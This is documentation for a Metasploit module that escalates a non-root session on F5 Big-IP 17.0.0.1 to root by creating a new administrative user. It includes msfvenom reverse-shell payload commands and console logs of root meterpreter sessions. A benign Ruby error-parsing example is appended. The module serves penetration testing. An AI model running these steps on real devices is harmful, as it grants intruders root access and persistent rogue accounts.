## Vulnerable Application

The vulnerable application is F5 Big-IP version 17.0.0.1 and below. It can be
downloaded for free as a VMware image (you have to create an account) from
https://downloads.f5.com. You can register for a free 30-day trial if you like,
but it's not required to test this.

Boot the VM and set an admin password by logging in with the default credentials
(admin / admin). You'll need that password.

## Verification Steps

1. Install the application
2. Start `msfconsole`
3. Do: Get a non-root session somehow (e.g. `use multi/handler` / `set PAYLOAD linux/x64/meterpreter_reverse_tcp`, then run the following):

   ```
   ./msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.0.0.179 LPORT=4444 -f elf > testexploit.elf && scp testexploit.elf root@10.0.0.162:/tmp && ssh root@10.0.0.162 /bin/bash << EOF
   chmod +x /tmp/testexploit.elf
   sudo -u apache /tmp/testexploit.elf
   EOF
   ```
4. Do: `use exploit/linux/local/f5_create_user`
5. Do: `set SESSION <sessionid>`
6. Do: `run`
7. You should get a session

## Options

### `USERNAME` / `PASSWORD`

The username and final password for the account. If blank, they'll be randomly
generated.

### `CREATE_SESSION`

If set (the default), the module spawns a root session. Otherwise, it only
creates the account.

## Scenarios

### F5 Big-IP 17.0.0.1 - Create a session with random creds

First, get a non-root session however you can. You can use a `multi/handler`
and `msfvenom`:

```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_tcp
PAYLOAD => linux/x64/meterpreter_reverse_tcp

msf6 exploit(multi/handler) > set LHOST 10.0.0.179
LHOST => 10.0.0.179

msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.0.0.179:4444 
[*] Meterpreter session 1 opened (10.0.0.179:4444 -> 10.0.0.162:34140) at 2022-11-14 15:59:49 -0800

[...run the payload...]

meterpreter > getuid
Server username: apache

meterpreter > bg

msf6 exploit(multi/handler) > setg SESSION 1
SESSION => 1
```

To create and run the payload, in another window:

```
$ ./msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.0.0.179 LPORT=4444 -f elf > testexploit.elf && chmod +x testexploit.elf && scp testexploit.elf root@10.0.0.162:/tmp && ssh root@10.0.0.162 sudo -u apache /tmp/testexploit.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1068640 bytes
Final size of elf file: 1068640 bytes
testexploit.elf
```

Now that we have a session, we can just run the module:

```
msf6 exploit(multi/handler) > use exploit/linux/local/f5_create_user
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/local/f5_create_user) > exploit

[*] Started reverse TCP handler on 10.0.0.179:4444 
[*] Will attempt to create user 7yI5vLIK / woquVd36PhcG, then change password to 9d9s83bBPwu5 when creating a session
[+] Service didn't return an error, so user was likely created!
[*] Attempting create a root session...
[*] Sending stage (40168 bytes) to 10.0.0.162
[*] Meterpreter session 2 opened (10.0.0.179:4444 -> 10.0.0.162:45254) at 2022-11-14 16:02:10 -0800

meterpreter > getuid
Server username: root
```

### F5 Big-IP 17.0.0.1 - Create a session with set creds

Create a session as shown above, then:

```
msf6 exploit(linux/local/f5_create_user) > set USERNAME mymsfdemouser
USERNAME => mymsfdemouser
msf6 exploit(linux/local/f5_create_user) > set PASSWORD mybigmsfdemopassword
PASSWORD => mybigmsfdemopassword
msf6 exploit(linux/local/f5_create_user) > set VERBOSE true
VERBOSE => true
msf6 exploit(linux/local/f5_create_user) > exploit

[*] Started reverse TCP handler on 10.0.0.179:4444 
[*] Will attempt to create user mymsfdemouser / QVEE0pqM7pAd, then change password to mybigmsfdemopassword when creating a session
[*] Hashing the password with a pseudorandom salt
[+] Service didn't return an error, so user was likely created!
[*] Attempting create a root session...
[*] Sending stage (40164 bytes) to 10.0.0.162
[*] Output from su command: Password: You are required to change your password immediately (root enforced)
(current) BIG-IP password: New BIG-IP password: Retype new BIG-IP password: Changing password for mymsfdemouser.
[*] Meterpreter session 3 opened (10.0.0.179:4444 -> 10.0.0.162:49646) at 2022-11-14 16:03:04 -0800

meterpreter > getuid
Server username: root
```

### F5 Big-IP 17.0.0.1 - Just create an account with random creds

Get a session as shown above, then:

```
msf6 exploit(linux/local/f5_create_user) > set CREATE_SESSION false
CREATE_SESSION => false
msf6 exploit(linux/local/f5_create_user) > exploit

[*] Started reverse TCP handler on 10.0.0.179:4444 
[*] Will attempt to create user hKjGGrlU / yRQijFQjVjqa
[*] Hashing the password with a pseudorandom salt
[+] Service didn't return an error, so user was likely created!
^C[*] Exploit completed, but no session was created.
```

### F5 Big-IP 17.0.0.1 - Just create an account with set creds

Get a session as shown above, then:

```
msf6 exploit(linux/local/f5_create_user) > set CREATE_SESSION false
CREATE_SESSION => false
msf6 exploit(linux/local/f5_create_user) > set USERNAME mymsfdemouser2
USERNAME => mymsfdemouser2
msf6 exploit(linux/local/f5_create_user) > set PASSWORD mybigmsfdemopassword
PASSWORD => mybigmsfdemopassword
msf6 exploit(linux/local/f5_create_user) > exploit

[*] Started reverse TCP handler on 10.0.0.179:4444 
[*] Will attempt to create user mymsfdemouser2 / mybigmsfdemopassword
[*] Hashing the password with a pseudorandom salt
[+] Service didn't return an error, so user was likely created!
^C[*] Exploit completed, but no session was created.
```

### F5 Big-IP 17.0.0.1 - Create an account with an error

Get a session as shown above, then (we use a duplicate username):

```

[*] Started reverse TCP handler on 10.0.0.179:4444 
[*] Will attempt to create user mymsfdemouser2 / mybigmsfdemopassword
[*] Hashing the password with a pseudorandom salt
[-] mcp query returned an error message: 01020066:3: The requested user (mymsfdemouser2) already exists in partition Common. (code: 16908390)
```
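
The error string in this scenario has a regular shape, so it can be split into fields when triaging module output or test logs. The following is an added example, not code from the module; the function names are hypothetical, the field layout is inferred only from the one line shown above, and the sample is that line copied into a constant.

```ruby
# Added example (not part of the Metasploit module): parse an mcp error string
# of the shape shown in the scenario above and cross-check its two numeric ids.

# "<8 hex digits>:<digit>: <text> (code: <decimal>)" -- layout inferred from
# the single sample on this page; the trailing "(code: N)" is treated as optional.
MCP_ERROR = /\A(?<id>\h{8}):(?<level>\d): (?<text>.*?)(?: \(code: (?<code>\d+)\))?\z/

# Constructed sample: the error text copied from the scenario output above.
SAMPLE = '01020066:3: The requested user (mymsfdemouser2) already exists in ' \
         'partition Common. (code: 16908390)'

# Returns a hash of fields, or nil when the line is not an mcp error string.
def parse_mcp_error(line)
  # Accept either the bare error or the full console line printed by the module.
  body = line.sub(/\A\[-\] mcp query returned an error message: /, '').strip
  m = MCP_ERROR.match(body)
  return nil unless m

  code = m[:code]&.to_i
  {
    message_id: m[:id],
    level: m[:level].to_i, # second field, kept as-is; the page does not define it
    text: m[:text],
    code: code,
    # In the sample, the decimal code is the hex message id (0x01020066 == 16908390).
    code_matches_id: code.nil? ? nil : code == m[:id].hex
  }
end

# Extracts the user and partition from a "user already exists" error, else nil.
def duplicate_user(parsed)
  return nil unless parsed

  re = /The requested user \((?<user>[^)]+)\) already exists in partition (?<partition>\S+?)\.\z/
  m = re.match(parsed[:text])
  m && { user: m[:user], partition: m[:partition] }
end

if __FILE__ == $PROGRAM_NAME
  parsed = parse_mcp_error(SAMPLE)
  puts parsed.inspect
  puts duplicate_user(parsed).inspect
end
```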
